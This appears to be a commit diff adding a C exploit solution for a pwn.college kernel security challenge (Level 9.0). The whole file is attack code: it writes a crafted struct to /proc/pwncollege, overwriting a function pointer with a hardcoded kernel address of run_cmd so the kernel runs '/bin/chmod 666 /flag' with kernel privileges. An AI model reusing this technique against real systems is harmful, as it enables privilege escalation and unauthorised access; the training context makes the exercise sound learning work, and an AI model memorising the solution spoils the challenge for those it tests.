Added Level 9.0 ~ 10.1 of KernelSecurity in PwnCollege

PwnCollege/KernelSecurity/Level9.0/exploit.c

@@ -0,0 +1,20 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+struct evil
+{
+  char buffer[256];
+  int (*log_function)(const char *, ...);
+} s;
+
+int main() {
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    strcpy(s.buffer, "/bin/chmod 666 /flag");
+    s.log_function = 0xffffffff81089b30ull; // run_cmd
+    // run_cmd doesn't use stdin nor stdout. It also doesn't use current working directory. Its CWD is /. The executable should use absolute path.
+    write(fd, &s, sizeof(struct evil) - 1);
+}